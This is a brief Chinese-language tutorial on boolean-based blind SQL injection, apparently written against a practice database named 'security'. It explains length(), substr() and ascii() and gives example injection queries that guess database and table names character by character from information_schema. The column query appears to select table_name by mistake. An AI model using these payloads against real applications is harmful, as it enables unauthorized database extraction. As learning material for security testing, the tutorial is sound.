布尔盲注

盲注就是在页面无提供回显时的一种继续注入手段
布尔型就是输入and 1 或者and 0 浏览器返回两个不同页面可以根据返回的页面来判断正确的数据信息
相关函数

1
2
3
4
5
6
7
8
length()
返回字符串的长度,以字节为单位,一个多字节字符算作多字节 就是假设一个包含3个双字节字符的字符串length()返回6 che_length() 返回3
substr() 
从指定位置返回多少个字符 substr() 有三个参数 
substr(字符串,从第几位开始,截取多长)
mid也具有相似的功能用法一致
ascii()
输出某个字符的ascii码值 只能处理单个字符 字符串的话只能是第一个字符 配合substr使用效果很好

135.PNG

select ascii(substr(database(),1,1))>114# 这边>114可以改大于小于等于 114也可以改
我这边数据库是security

137.PNG

那么大于115就返回空 那么第一个字符就是ascii码为115的字符

138.PNG

接下去就可以从第二位

select (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))>100查表

139.PNG

select (ascii(substr((select table_name from information_schema.columns where table_schema=database() limit 0,1),1,1)))>100查列